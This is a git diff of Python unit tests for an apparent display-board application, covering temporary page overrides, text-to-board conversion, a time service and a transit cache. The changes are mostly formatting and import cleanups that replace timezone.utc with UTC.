-            page_id="p1", expires_at=past, revert_mode="schedule"
-        )
+        settings_service._temporary_override = TemporaryOverride(page_id="p1", expires_at=past, revert_mode="schedule")
         r = client.get("/settings/temporary-override")
         assert r.status_code == 200
         assert r.json()["active"] is False
@@ -99,6 +99,7 @@ class TestGetTemporaryOverride:
 # ---------------------------------------------------------------------------
 # POST /settings/temporary-override
 # ---------------------------------------------------------------------------
+
 
 class TestSetTemporaryOverride:
     def test_success(self, client_with_page):
@@ -184,9 +185,10 @@ class TestSetTemporaryOverride:
 # DELETE /settings/temporary-override
 # ---------------------------------------------------------------------------
 
+
 class TestClearTemporaryOverride:
     def test_clears_active_override(self, client, settings_service):
-        expires = (datetime.now(timezone.utc) + timedelta(minutes=10)).isoformat()
+        expires = (datetime.now(UTC) + timedelta(minutes=10)).isoformat()
         settings_service.set_temporary_override(
             TemporaryOverride(page_id="p1", expires_at=expires, revert_mode="schedule")
         )
@@ -201,11 +203,9 @@ class TestClearTemporaryOverride:
         assert r.json()["status"] == "cleared"
 
     def test_clear_sets_active_page_for_revert_page_mode(self, client, settings_service):
-        expires = (datetime.now(timezone.utc) + timedelta(minutes=10)).isoformat()
+        expires = (datetime.now(UTC) + timedelta(minutes=10)).isoformat()
         settings_service.set_temporary_override(
-            TemporaryOverride(
-                page_id="p1", expires_at=expires, revert_mode="page", revert_page_id="p2"
-            )
+            TemporaryOverride(page_id="p1", expires_at=expires, revert_mode="page", revert_page_id="p2")
         )
         client.delete("/settings/temporary-override")
         assert settings_service.get_active_page_id() == "p2"
@@ -214,6 +214,7 @@ class TestClearTemporaryOverride:
 # ---------------------------------------------------------------------------
 # GET /schedules/active/page includes temporary_override field
 # ---------------------------------------------------------------------------
+
 
 class TestActiveScheduleIncludesOverride:
     def test_override_field_present_when_no_override(self, client, settings_service):
@@ -224,7 +225,7 @@ class TestActiveScheduleIncludesOverride:
         assert data["temporary_override"]["active"] is False
 
     def test_override_field_active_when_override_set(self, client, settings_service):
-        expires = (datetime.now(timezone.utc) + timedelta(minutes=5)).isoformat()
+        expires = (datetime.now(UTC) + timedelta(minutes=5)).isoformat()
         settings_service.set_temporary_override(
             TemporaryOverride(page_id="p1", expires_at=expires, revert_mode="schedule")
         )
@@ -237,10 +238,11 @@ class TestActiveScheduleIncludesOverride:
 # SettingsService unit tests
 # ---------------------------------------------------------------------------
 
+
 class TestSettingsServiceOverride:
     def test_set_and_get_override(self, tmp_settings_file):
         svc = SettingsService(settings_file=str(tmp_settings_file))
-        expires = (datetime.now(timezone.utc) + timedelta(minutes=30)).isoformat()
+        expires = (datetime.now(UTC) + timedelta(minutes=30)).isoformat()
         override = TemporaryOverride(page_id="p1", expires_at=expires, revert_mode="schedule")
         svc.set_temporary_override(override)
         result = svc.get_temporary_override()
@@ -249,10 +251,8 @@ class TestSettingsServiceOverride:
 
     def test_get_override_returns_none_when_expired(self, tmp_settings_file):
         svc = SettingsService(settings_file=str(tmp_settings_file))
-        past = (datetime.now(timezone.utc) - timedelta(minutes=1)).isoformat()
-        svc._temporary_override = TemporaryOverride(
-            page_id="p1", expires_at=past, revert_mode="schedule"
-        )
+        past = (datetime.now(UTC) - timedelta(minutes=1)).isoformat()
+        svc._temporary_override = TemporaryOverride(page_id="p1", expires_at=past, revert_mode="schedule")
         result = svc.get_temporary_override()
         assert result is None
         # Also verifies auto-clear persisted
@@ -260,20 +260,16 @@ class TestSettingsServiceOverride:
 
     def test_clear_override(self, tmp_settings_file):
         svc = SettingsService(settings_file=str(tmp_settings_file))
-        expires = (datetime.now(timezone.utc) + timedelta(minutes=10)).isoformat()
-        svc.set_temporary_override(
-            TemporaryOverride(page_id="p1", expires_at=expires, revert_mode="blank")
-        )
+        expires = (datetime.now(UTC) + timedelta(minutes=10)).isoformat()
+        svc.set_temporary_override(TemporaryOverride(page_id="p1", expires_at=expires, revert_mode="blank"))
         svc.clear_temporary_override()
         assert svc.get_temporary_override() is None
 
     def test_override_survives_service_restart(self, tmp_settings_file):
         # Write override with first instance
         svc1 = SettingsService(settings_file=str(tmp_settings_file))
-        expires = (datetime.now(timezone.utc) + timedelta(minutes=10)).isoformat()
-        svc1.set_temporary_override(
-            TemporaryOverride(page_id="p1", expires_at=expires, revert_mode="schedule")
-        )
+        expires = (datetime.now(UTC) + timedelta(minutes=10)).isoformat()
+        svc1.set_temporary_override(TemporaryOverride(page_id="p1", expires_at=expires, revert_mode="schedule"))
         # Reload with second instance
         svc2 = SettingsService(settings_file=str(tmp_settings_file))
         result = svc2.get_temporary_override()
@@ -282,11 +278,9 @@ class TestSettingsServiceOverride:
 
     def test_expired_override_not_loaded_on_restart(self, tmp_settings_file):
         svc1 = SettingsService(settings_file=str(tmp_settings_file))
-        past = (datetime.now(timezone.utc) - timedelta(minutes=1)).isoformat()
+        past = (datetime.now(UTC) - timedelta(minutes=1)).isoformat()
         # Write expired override directly to the file
-        svc1._temporary_override = TemporaryOverride(
-            page_id="p1", expires_at=past, revert_mode="schedule"
-        )
+        svc1._temporary_override = TemporaryOverride(page_id="p1", expires_at=past, revert_mode="schedule")
         svc1._save_to_file()
         # Reload — expired override should be discarded
         svc2 = SettingsService(settings_file=str(tmp_settings_file))
@@ -294,10 +288,8 @@ class TestSettingsServiceOverride:
 
     def test_consume_returns_live_override(self, tmp_settings_file):
         svc = SettingsService(settings_file=str(tmp_settings_file))
-        expires = (datetime.now(timezone.utc) + timedelta(minutes=10)).isoformat()
-        svc.set_temporary_override(
-            TemporaryOverride(page_id="p1", expires_at=expires, revert_mode="schedule")
-        )
+        expires = (datetime.now(UTC) + timedelta(minutes=10)).isoformat()
+        svc.set_temporary_override(TemporaryOverride(page_id="p1", expires_at=expires, revert_mode="schedule"))
         result = svc.consume_temporary_override()
         assert result is not None
         assert result.page_id == "p1"
@@ -307,10 +299,8 @@ class TestSettingsServiceOverride:
 
     def test_consume_returns_expired_override_and_clears_it(self, tmp_settings_file):
         svc = SettingsService(settings_file=str(tmp_settings_file))
-        past = (datetime.now(timezone.utc) - timedelta(minutes=1)).isoformat()
-        svc._temporary_override = TemporaryOverride(
-            page_id="p1", expires_at=past, revert_mode="blank"
-        )
+        past = (datetime.now(UTC) - timedelta(minutes=1)).isoformat()
+        svc._temporary_override = TemporaryOverride(page_id="p1", expires_at=past, revert_mode="blank")
         result = svc.consume_temporary_override()
         # Returns the expired object so caller can apply revert logic
         assert result is not None
@@ -321,14 +311,10 @@ class TestSettingsServiceOverride:
 
     def test_second_override_replaces_first(self, tmp_settings_file):
         svc = SettingsService(settings_file=str(tmp_settings_file))
-        t1 = (datetime.now(timezone.utc) + timedelta(minutes=30)).isoformat()
-        t2 = (datetime.now(timezone.utc) + timedelta(minutes=5)).isoformat()
-        svc.set_temporary_override(
-            TemporaryOverride(page_id="first-page", expires_at=t1, revert_mode="schedule")
-        )
-        svc.set_temporary_override(
-            TemporaryOverride(page_id="second-page", expires_at=t2, revert_mode="blank")
-        )
+        t1 = (datetime.now(UTC) + timedelta(minutes=30)).isoformat()
+        t2 = (datetime.now(UTC) + timedelta(minutes=5)).isoformat()
+        svc.set_temporary_override(TemporaryOverride(page_id="first-page", expires_at=t1, revert_mode="schedule"))
+        svc.set_temporary_override(TemporaryOverride(page_id="second-page", expires_at=t2, revert_mode="blank"))
         result = svc.get_temporary_override()
         assert result is not None
         assert result.page_id == "second-page"

--- a/tests/test_temporary_override_model.py
+++ b/tests/test_temporary_override_model.py
@@ -1,15 +1,16 @@
 """Unit tests for the TemporaryOverride dataclass."""
-from datetime import datetime, timezone, timedelta
+
+from datetime import UTC, datetime, timedelta
 
 from src.settings.service import TemporaryOverride
 
 
 def _future_iso(minutes: int = 10) -> str:
-    return (datetime.now(timezone.utc) + timedelta(minutes=minutes)).isoformat()
+    return (datetime.now(UTC) + timedelta(minutes=minutes)).isoformat()
 
 
 def _past_iso(minutes: int = 1) -> str:
-    return (datetime.now(timezone.utc) - timedelta(minutes=minutes)).isoformat()
+    return (datetime.now(UTC) - timedelta(minutes=minutes)).isoformat()
 
 
 class TestTemporaryOverrideExpiry:
@@ -23,7 +24,7 @@ class TestTemporaryOverrideExpiry:
 
     def test_is_expired_handles_naive_datetime(self):
         # Naive ISO string (no tz) should be treated as UTC
-        naive = (datetime.now(timezone.utc) - timedelta(minutes=1)).replace(tzinfo=None).isoformat()
+        naive = (datetime.now(UTC) - timedelta(minutes=1)).replace(tzinfo=None).isoformat()
         o = TemporaryOverride(page_id="p1", expires_at=naive, revert_mode="schedule")
         assert o.is_expired()
 

--- a/tests/test_text_to_board.py
+++ b/tests/test_text_to_board.py
@@ -4,18 +4,18 @@ text_to_board contains pure, deterministic conversion logic — character
 mapping and board array construction. This addresses issue #505.
 """
 
-from src.text_to_board import (
-    text_to_board_array,
-    format_board_array_preview,
-    validate_board_array,
-    COLOR_CODES,
-)
 from src.board_chars import BoardChars
-
+from src.text_to_board import (
+    COLOR_CODES,
+    format_board_array_preview,
+    text_to_board_array,
+    validate_board_array,
+)
 
 # ---------------------------------------------------------------------------
 # Helpers
 # ---------------------------------------------------------------------------
+
 
 def make_empty_board(rows=6, cols=22):
     return [[BoardChars.SPACE] * cols for _ in range(rows)]
@@ -24,6 +24,7 @@ def make_empty_board(rows=6, cols=22):
 # ---------------------------------------------------------------------------
 # text_to_board_array — basic conversion
 # ---------------------------------------------------------------------------
+
 
 class TestTextToBoardArray:
     def test_empty_string_returns_blank_board(self):
@@ -45,13 +46,13 @@ class TestTextToBoardArray:
     def test_letter_a_placed_first_column(self):
         board = text_to_board_array("A")
         # 'A' should be code 1
-        assert board[0][0] == BoardChars.get_char_code('A')
+        assert board[0][0] == BoardChars.get_char_code("A")
 
     def test_multiple_letters(self):
         board = text_to_board_array("ABC")
-        a_code = BoardChars.get_char_code('A')
-        b_code = BoardChars.get_char_code('B')
-        c_code = BoardChars.get_char_code('C')
+        a_code = BoardChars.get_char_code("A")
+        b_code = BoardChars.get_char_code("B")
+        c_code = BoardChars.get_char_code("C")
         assert board[0][0] == a_code
         assert board[0][1] == b_code
         assert board[0][2] == c_code
@@ -63,8 +64,8 @@ class TestTextToBoardArray:
 
     def test_newline_starts_new_row(self):
         board = text_to_board_array("A\nB")
-        a_code = BoardChars.get_char_code('A')
-        b_code = BoardChars.get_char_code('B')
+        a_code = BoardChars.get_char_code("A")
+        b_code = BoardChars.get_char_code("B")
         assert board[0][0] == a_code
         assert board[1][0] == b_code
 
@@ -91,6 +92,7 @@ class TestTextToBoardArray:
 # text_to_board_array — color markers
 # ---------------------------------------------------------------------------
 
+
 class TestColorMarkers:
     def test_named_color_red(self):
         board = text_to_board_array("{red}")
@@ -112,17 +114,17 @@ class TestColorMarkers:
         # {red}A should place red at col 0, A at col 1
         board = text_to_board_array("{red}A")
         assert board[0][0] == COLOR_CODES["red"]
-        assert board[0][1] == BoardChars.get_char_code('A')
+        assert board[0][1] == BoardChars.get_char_code("A")
 
     def test_end_tag_ignored(self):
         # {/red} should be skipped, not consuming a tile
         board = text_to_board_array("{/red}A")
-        assert board[0][0] == BoardChars.get_char_code('A')
+        assert board[0][0] == BoardChars.get_char_code("A")
 
     def test_use_color_tiles_false_strips_markers(self):
         board = text_to_board_array("{red}A", use_color_tiles=False)
         # Color marker is stripped; A goes to position 0
-        assert board[0][0] == BoardChars.get_char_code('A')
+        assert board[0][0] == BoardChars.get_char_code("A")
 
     def test_double_brace_color_marker_not_processed(self):
         # The formatter uses {{red}} syntax but text_to_board uses {red}
@@ -151,6 +153,7 @@ class TestColorMarkers:
 # ---------------------------------------------------------------------------
 # validate_board_array
 # ---------------------------------------------------------------------------
+
 
 class TestValidateBoardArray:
     def test_valid_default_board(self):
@@ -184,7 +187,7 @@ class TestValidateBoardArray:
 
     def test_valid_boundary_codes(self):
         board = [[0] * 22 for _ in range(6)]
-        board[0][0] = 0   # Min
+        board[0][0] = 0  # Min
         board[0][1] = 71  # Max
         assert validate_board_array(board) is True
 
@@ -195,6 +198,7 @@ class TestValidateBoardArray:
 # ---------------------------------------------------------------------------
 # format_board_array_preview
 # ---------------------------------------------------------------------------
+
 
 class TestFormatBoardArrayPreview:
     def test_returns_string(self):
@@ -242,6 +246,7 @@ class TestFormatBoardArrayPreview:
 # COLOR_CODES constants
 # ---------------------------------------------------------------------------
 
+
 class TestColorCodes:
     def test_all_colors_defined(self):
         expected = {"red", "orange", "yellow", "green", "blue", "violet", "purple", "white", "black", "filled"}
@@ -273,13 +278,13 @@ class TestNoteFillSpaceEndToEnd:
         # on a NOTE device: 6 text chars + 9 blue tiles = 15 tiles
         rendered = "LUNCH:{67}{67}{67}{67}{67}{67}{67}{67}{67}\n               \n               "
         board = text_to_board_array(rendered, rows=3, cols=15)
-        
+
         assert len(board) == 3
         assert len(board[0]) == 15
-        
+
         # First row: L=12, U=21, N=14, C=3, H=8, :=50, then 9 blue tiles (67)
         assert board[0] == [12, 21, 14, 3, 8, 50, 67, 67, 67, 67, 67, 67, 67, 67, 67]
-        
+
         # Blue tile count should be exactly 9
         blue_count = sum(1 for code in board[0] if code == 67)
         assert blue_count == 9
@@ -289,7 +294,7 @@ class TestNoteFillSpaceEndToEnd:
         # Entire line of green
         rendered = "{66}" * 15 + "\n" + " " * 15 + "\n" + " " * 15
         board = text_to_board_array(rendered, rows=3, cols=15)
-        
+
         # All 15 positions should be green (66)
         assert all(code == 66 for code in board[0])
 
@@ -297,6 +302,6 @@ class TestNoteFillSpaceEndToEnd:
         """Color code 71 (filled) should be recognized in text_to_board_array."""
         rendered = "A{71}B"
         board = text_to_board_array(rendered, rows=1, cols=3)
-        assert board[0][0] == 1   # A
+        assert board[0][0] == 1  # A
         assert board[0][1] == 71  # filled
-        assert board[0][2] == 2   # B
+        assert board[0][2] == 2  # B

--- a/tests/test_time_service.py
+++ b/tests/test_time_service.py
@@ -1,285 +1,284 @@
 """Tests for TimeService."""
 
-from datetime import datetime, timezone
-
+from datetime import UTC, datetime
 from unittest.mock import Mock, patch
 
 from src.time_service import TimeService, get_time_service, reset_time_service
 
-UTC = timezone.utc
+UTC = UTC
 
 
 class TestTimeServiceCore:
     """Tests for core time operations."""
-    
+
     def test_get_current_utc(self):
         """Test get_current_utc returns UTC datetime."""
         service = TimeService()
         utc_now = service.get_current_utc()
-        
+
         assert utc_now.tzinfo == UTC
         assert isinstance(utc_now, datetime)
-    
+
     def test_get_current_time_default_timezone(self):
         """Test get_current_time with default timezone."""
         service = TimeService(default_timezone="America/Los_Angeles")
         pst_now = service.get_current_time()
-        
+
         assert pst_now.tzinfo is not None
         assert isinstance(pst_now, datetime)
-    
+
     def test_get_current_time_specified_timezone(self):
         """Test get_current_time with specified timezone."""
         service = TimeService()
         est_now = service.get_current_time("America/New_York")
-        
+
         assert est_now.tzinfo is not None
         assert isinstance(est_now, datetime)
-    
+
     def test_get_current_time_invalid_timezone_uses_default(self):
         """Test get_current_time with invalid timezone falls back to default."""
         service = TimeService(default_timezone="America/Los_Angeles")
         result = service.get_current_time("Invalid/Timezone")
-        
+
         assert result.tzinfo is not None  # Should still return something
 
 
 class TestTimeServiceSilenceMode:
     """Tests for silence mode time window checking."""
-    
+
     def test_is_time_in_window_same_day_inside(self):
         """Test time window check for same-day window, time inside."""
         service = TimeService()
-        
+
         # Mock get_current_utc to return 12:00 UTC
-        with patch.object(service, 'get_current_utc') as mock_get_utc:
+        with patch.object(service, "get_current_utc") as mock_get_utc:
             mock_get_utc.return_value = datetime(2024, 1, 15, 12, 0, tzinfo=UTC)
-            
+
             # Window: 10:00 UTC to 14:00 UTC
             result = service.is_time_in_window("10:00+00:00", "14:00+00:00")
-            
+
             assert result is True
-    
+
     def test_is_time_in_window_same_day_outside(self):
         """Test time window check for same-day window, time outside."""
         service = TimeService()
-        
+
         # Mock get_current_utc to return 15:00 UTC
-        with patch.object(service, 'get_current_utc') as mock_get_utc:
+        with patch.object(service, "get_current_utc") as mock_get_utc:
             mock_get_utc.return_value = datetime(2024, 1, 15, 15, 0, tzinfo=UTC)
-            
+
             # Window: 10:00 UTC to 14:00 UTC
             result = service.is_time_in_window("10:00+00:00", "14:00+00:00")
-            
+
             assert result is False
-    
+
     def test_is_time_in_window_midnight_spanning_before_midnight(self):
         """Test midnight-spanning window, current time before midnight."""
         service = TimeService()
-        
+
         # Mock get_current_utc to return 22:00 UTC
-        with patch.object(service, 'get_current_utc') as mock_get_utc:
+        with patch.object(service, "get_current_utc") as mock_get_utc:
             mock_get_utc.return_value = datetime(2024, 1, 15, 22, 0, tzinfo=UTC)
-            
+
             # Window: 20:00 UTC to 08:00 UTC (spans midnight)
             result = service.is_time_in_window("20:00+00:00", "08:00+00:00")
-            
+
             assert result is True
-    
+
     def test_is_time_in_window_midnight_spanning_after_midnight(self):
         """Test midnight-spanning window, current time after midnight."""
         service = TimeService()
-        
+
         # Mock get_current_utc to return 06:00 UTC
-        with patch.object(service, 'get_current_utc') as mock_get_utc:
+        with patch.object(service, "get_current_utc") as mock_get_utc:
             mock_get_utc.return_value = datetime(2024, 1, 15, 6, 0, tzinfo=UTC)
-            
+
             # Window: 20:00 UTC to 08:00 UTC (spans midnight)
             result = service.is_time_in_window("20:00+00:00", "08:00+00:00")
-            
+
             assert result is True
-    
+
     def test_is_time_in_window_midnight_spanning_outside(self):
         """Test midnight-spanning window, current time outside."""
         service = TimeService()
-        
+
         # Mock get_current_utc to return 12:00 UTC
-        with patch.object(service, 'get_current_utc') as mock_get_utc:
+        with patch.object(service, "get_current_utc") as mock_get_utc:
             mock_get_utc.return_value = datetime(2024, 1, 15, 12, 0, tzinfo=UTC)
-            
+
             # Window: 20:00 UTC to 08:00 UTC (spans midnight)
             result = service.is_time_in_window("20:00+00:00", "08:00+00:00")
-            
+
             assert result is False
-    
+
     def test_is_time_in_window_invalid_format_returns_false(self):
         """Test invalid time format returns False."""
         service = TimeService()
-        
+
         result = service.is_time_in_window("invalid", "14:00+00:00")
-        
+
         assert result is False
 
 
 class TestTimeServiceConversions:
     """Tests for timezone conversion functions."""
-    
+
     def test_local_to_utc_iso_pst(self):
         """Test converting PST local time to UTC ISO."""
         service = TimeService()
-        
+
         # 20:00 PST (UTC-8 in winter) = 04:00 UTC next day
         result = service.local_to_utc_iso("20:00", "America/Los_Angeles")
-        
+
         # Result should be in UTC format (time only, not date-dependent in this test)
         assert "+00:00" in result
         assert ":" in result
-    
+
     def test_local_to_utc_iso_est(self):
         """Test converting EST local time to UTC ISO."""
         service = TimeService()
-        
+
         # 20:00 EST (UTC-5 in winter) = 01:00 UTC next day
         result = service.local_to_utc_iso("20:00", "America/New_York")
-        
+
         assert "+00:00" in result
         assert ":" in result
-    
+
     def test_utc_iso_to_local_pst(self):
         """Test converting UTC ISO to PST local time."""
         service = TimeService()
-        
+
         # 04:00 UTC = 20:00 PST (UTC-8 in winter)
         result = service.utc_iso_to_local("04:00+00:00", "America/Los_Angeles")
-        
+
         # Should return local time format
         assert ":" in result
         assert len(result) == 5  # HH:MM format
-    
+
     def test_utc_iso_to_local_invalid_timezone_uses_utc(self):
         """Test invalid timezone falls back to UTC."""
         service = TimeService()
-        
+
         result = service.utc_iso_to_local("12:00+00:00", "Invalid/Timezone")
-        
+
         # Should still return a valid time
         assert ":" in result
-    
+
     def test_local_to_utc_iso_invalid_time_returns_default(self):
         """Test invalid time format returns default."""
         service = TimeService()
-        
+
         result = service.local_to_utc_iso("invalid", "America/Los_Angeles")
-        
+
         assert result == "00:00+00:00"
 
 
 class TestTimeServiceTimestamps:
     """Tests for timestamp generation and formatting."""
-    
+
     def test_create_utc_timestamp(self):
         """Test creating UTC timestamp."""
         service = TimeService()
-        
+
         timestamp = service.create_utc_timestamp()
-        
+
         # Should be ISO format with timezone
         assert "T" in timestamp  # ISO format separator
         assert "+" in timestamp or "Z" in timestamp or timestamp.endswith("+00:00")
-    
+
     def test_format_timestamp_local_pst(self):
         """Test formatting UTC timestamp to PST."""
         service = TimeService()
-        
+
         # Create a UTC timestamp
         utc_timestamp = "2025-12-26T22:30:00+00:00"
-        
+
         result = service.format_timestamp_local(utc_timestamp, "America/Los_Angeles")
-        
+
         # Should contain date, time, and timezone abbreviation
         assert "2025" in result
         assert ":" in result
         # Should have timezone info (PST or PDT depending on DST)
         assert any(tz in result for tz in ["PST", "PDT", "P"])
-    
+
     def test_format_timestamp_local_invalid_timestamp_returns_original(self):
         """Test invalid timestamp returns original string."""
         service = TimeService()
-        
+
         invalid_timestamp = "not-a-timestamp"
         result = service.format_timestamp_local(invalid_timestamp, "America/Los_Angeles")
-        
+
         assert result == invalid_timestamp
 
 
 class TestTimeServiceParseIsoTime:
     """Tests for ISO time parsing."""
-    
+
     def test_parse_iso_time_utc(self):
         """Test parsing UTC time."""
         service = TimeService()
-        
+
         result = service.parse_iso_time("12:00+00:00")
-        
+
         assert result is not None
         assert isinstance(result, datetime)
         assert result.tzinfo == UTC
-    
+
     def test_parse_iso_time_with_negative_offset(self):
         """Test parsing time with negative offset (e.g., PST)."""
         service = TimeService()
-        
+
         result = service.parse_iso_time("20:00-08:00")
-        
+
         assert result is not None
         assert isinstance(result, datetime)
-    
+
     def test_parse_iso_time_with_positive_offset(self):
         """Test parsing time with positive offset (e.g., CET)."""
         service = TimeService()
-        
+
         result = service.parse_iso_time("14:00+01:00")
-        
+
         assert result is not None
         assert isinstance(result, datetime)
-    
+
     def test_parse_iso_time_invalid_format_returns_none(self):
         """Test invalid format returns None."""
         service = TimeService()
-        
+
         result = service.parse_iso_time("invalid")
-        
+
         assert result is None
-    
+
     def test_parse_iso_time_short_format_returns_none(self):
         """Test short format (old HH:MM) returns None."""
         service = TimeService()
-        
+
         result = service.parse_iso_time("12:00")
-        
+
         assert result is None
 
 
 class TestTimeServiceSingleton:
     """Tests for singleton pattern."""
-    
+
     def test_get_time_service_returns_singleton(self):
         """Test get_time_service returns same instance."""
         reset_time_service()  # Reset first
-        
+
         service1 = get_time_service()
         service2 = get_time_service()
-        
+
         assert service1 is service2
-    
+
     def test_reset_time_service(self):
         """Test reset_time_service creates new instance."""
         service1 = get_time_service()
         reset_time_service()
         service2 = get_time_service()
-        
+
         assert service1 is not service2
-    
+
     def test_get_time_service_uses_configured_timezone(self):
         """Test get_time_service reads timezone from Config.GENERAL_TIMEZONE.
 
@@ -296,17 +295,17 @@ class TestTimeServiceSingleton:
 
 class TestTimeServiceInitialization:
     """Tests for TimeService initialization."""
-    
+
     def test_init_with_valid_timezone(self):
         """Test initialization with valid timezone."""
         service = TimeService(default_timezone="America/New_York")
-        
+
         assert service.default_timezone == "America/New_York"
-    
+
     def test_init_with_invalid_timezone_falls_back_to_utc(self):
         """Test initialization with invalid timezone falls back to UTC."""
         service = TimeService(default_timezone="Invalid/Timezone")
-        
+
         # Should still initialize, using UTC as fallback
         assert service._default_tz == UTC
 
@@ -398,7 +397,7 @@ class TestUtcIsoToLocalEdgeCases:
     def test_conversion_exception_returns_default(self):
         """Exception during astimezone returns default (lines 239-241)."""
         service = TimeService()
-        with patch.object(service, 'parse_iso_time') as mock_parse:
+        with patch.object(service, "parse_iso_time") as mock_parse:
             mock_dt = Mock()
             mock_dt.astimezone.side_effect = Exception("conversion error")
             mock_parse.return_value = mock_dt
@@ -422,4 +421,3 @@ class TestFormatTimestampLocalEdgeCases:
         result = service.format_timestamp_local("2025-06-15T12:00:00+00:00", "Fake/Zone")
         assert "2025" in result
         assert "UTC" in result
-

--- a/tests/test_transit_cache.py
+++ b/tests/test_transit_cache.py
@@ -1,10 +1,12 @@
 """Tests for regional transit cache service."""
 
-import pytest
-import time
 import json
 import threading
+import time
 from unittest.mock import Mock, patch
+
+import pytest
+
 from src.utils.transit_cache import TransitCache, get_transit_cache
 
 
@@ -13,28 +15,28 @@ def reset_transit_cache():
     """Reset TransitCache singleton before each test to ensure test isolation."""
     # Import the module-level variable
     import src.utils.transit_cache as transit_cache_module
-    
+
     # Stop any running threads
     if TransitCache._instance is not None:
         cache = TransitCache._instance
-        if hasattr(cache, '_stop_event'):
+        if hasattr(cache, "_stop_event"):
             cache._stop_event.set()
-        if hasattr(cache, '_refresh_thread') and cache._refresh_thread:
+        if hasattr(cache, "_refresh_thread") and cache._refresh_thread:
             cache._refresh_thread.join(timeout=1)
-    
+
     # Reset both class-level and module-level singletons
     TransitCache._instance = None
     TransitCache._lock = threading.Lock()
     transit_cache_module._cache_instance = None
-    
+
     yield
-    
+
     # Cleanup after test
     if TransitCache._instance is not None:
         cache = TransitCache._instance
-        if hasattr(cache, '_stop_event'):
+        if hasattr(cache, "_stop_event"):
             cache._stop_event.set()
-        if hasattr(cache, '_refresh_thread') and cache._refresh_thread:
+        if hasattr(cache, "_refresh_thread") and cache._refresh_thread:
             cache._refresh_thread.join(timeout=1)
         TransitCache._instance = None
         transit_cache_module._cache_instance = None
@@ -54,8 +56,8 @@ def mock_regional_response():
                             "MonitoredCall": {
                                 "StopPointRef": "SF_15210",
                                 "StopPointName": "Judah St & 34th Ave",
-                                "ExpectedArrivalTime": "2024-12-26T10:05:00-08:00"
-                            }
+                                "ExpectedArrivalTime": "2024-12-26T10:05:00-08:00",
+                            },
                         }
                     },
                     {
@@ -65,8 +67,8 @@ def mock_regional_response():
                             "MonitoredCall": {
                                 "StopPointRef": "SF_15210",
                                 "StopPointName": "Judah St & 34th Ave",
-                                "ExpectedArrivalTime": "2024-12-26T10:12:00-08:00"
-                            }
+                                "ExpectedArrivalTime": "2024-12-26T10:12:00-08:00",
+                            },
                         }
                     },
                     {
@@ -76,10 +78,10 @@ def mock_regional_response():
                             "MonitoredCall": {
                                 "StopPointRef": "BA_12TH",
                                 "StopPointName": "12th St Oakland City Center",
-                                "ExpectedArrivalTime": "2024-12-26T10:03:00-08:00"
-                            }
+                                "ExpectedArrivalTime": "2024-12-26T10:03:00-08:00",
+                            },
                         }
-                    }
+                    },
                 ]
             }
         }
@@ -88,59 +90,55 @@ def mock_regional_response():
 
 class TestTransitCache:
     """Test cases for TransitCache singleton service."""
-    
+
     def test_singleton_pattern(self):
         """Test that TransitCache is a singleton."""
         cache1 = TransitCache()
         cache2 = TransitCache()
         assert cache1 is cache2
-        
+
         cache3 = get_transit_cache()
         assert cache3 is cache1
-    
+
     def test_configure(self):
         """Test cache configuration."""
         cache = TransitCache()
-        cache.configure(
-            api_key="test-key",
-            refresh_interval=60,
-            enabled=True
-        )
-        
+        cache.configure(api_key="test-key", refresh_interval=60, enabled=True)
+
         status = cache.get_status()
         assert status["enabled"] is True
         assert status["refresh_interval"] == 60
-    
+
     def test_parse_and_index(self, mock_regional_response):
         """Test parsing and indexing of regional transit data."""
         cache = TransitCache()
         cache._parse_and_index(mock_regional_response)
-        
+
         # Check SF stops are indexed
         sf_stops = cache.get_all_stops_for_agency("SF")
         assert "15210" in sf_stops
         assert len(sf_stops["15210"]) == 2  # Two N-Judah arrivals
-        
+
         # Check BA (BART) stops are indexed
         ba_stops = cache.get_all_stops_for_agency("BA")
         assert "12TH" in ba_stops
         assert len(ba_stops["12TH"]) == 1
-    
+
     def test_get_stops_data(self, mock_regional_response):
         """Test retrieving data for specific stops."""
         cache = TransitCache()
         cache._parse_and_index(mock_regional_response)
         cache._last_success = time.time()  # Mark as successful
-        
+
         # Get specific SF stops
         result = cache.get_stops_data("SF", ["15210", "99999"])
-        
+
         assert "15210" in result
         assert len(result["15210"]) == 2
         assert "99999" in result
         assert len(result["99999"]) == 0  # No data for non-existent stop
-    
-    @patch('src.utils.transit_cache.requests.get')
+
+    @patch("src.utils.transit_cache.requests.get")
     def test_refresh_data_success(self, mock_get, mock_regional_response):
         """Test successful data refresh."""
         # Mock HTTP response
@@ -149,47 +147,45 @@ class TestTransitCache:
         mock_response.text = json.dumps(mock_regional_response)
         mock_response.raise_for_status = Mock()
         mock_get.return_value = mock_response
-        
+
         cache = TransitCache()
         cache.configure(api_key="test-key", enabled=True)
         cache._refresh_data()
-        
+
         # Check cache was updated
         status = cache.get_status()
         assert status["refresh_count"] == 1
         assert status["last_success"] > 0
         assert cache.is_ready()
-        
+
         # Check data is available
         sf_stops = cache.get_all_stops_for_agency("SF")
         assert "15210" in sf_stops
-    
-    @patch('src.utils.transit_cache.requests.get')
+
+    @patch("src.utils.transit_cache.requests.get")
     def test_refresh_data_rate_limit(self, mock_get):
         """Test handling of rate limit errors."""
         # Mock HTTP 429 response
         mock_response = Mock()
         mock_response.status_code = 429
-        mock_response.raise_for_status = Mock(
-            side_effect=Exception("Rate limited")
-        )
+        mock_response.raise_for_status = Mock(side_effect=Exception("Rate limited"))
         mock_get.return_value = mock_response
-        
+
         cache = TransitCache()
         cache.configure(api_key="test-key", enabled=True)
         cache._refresh_data()
-        
+
         # Check error was recorded
         status = cache.get_status()
         assert status["error_count"] > 0
-    
+
     def test_get_status(self):
         """Test cache status reporting."""
         cache = TransitCache()
         cache.configure(api_key="test-key", refresh_interval=90, enabled=True)
-        
+
         status = cache.get_status()
-        
+
         # Check required fields
         assert "enabled" in status
         assert "refresh_interval" in status
@@ -203,55 +199,55 @@ class TestTransitCache:
         assert "agencies_cached" in status
         assert "total_stops_cached" in status
         assert "thread_alive" in status
-    
+
     def test_is_ready(self):
         """Test cache ready state."""
         cache = TransitCache()
-        
+
         # Cache not ready initially
         assert not cache.is_ready()
-        
+
         # Mark as successful
         with cache._data_lock:
             cache._last_success = time.time()
-        
+
         # Now should be ready
         assert cache.is_ready()
-    
+
     def test_stale_warning(self, mock_regional_response):
         """Test warning for stale cache."""
         cache = TransitCache()
         cache._parse_and_index(mock_regional_response)
-        
+
         # Set last success to 10 minutes ago
         with cache._data_lock:
             cache._last_success = time.time() - 600
-        
+
         status = cache.get_status()
         assert status["is_stale"] is True
         assert status["cache_age_seconds"] > cache.STALE_WARNING_THRESHOLD
-    
+
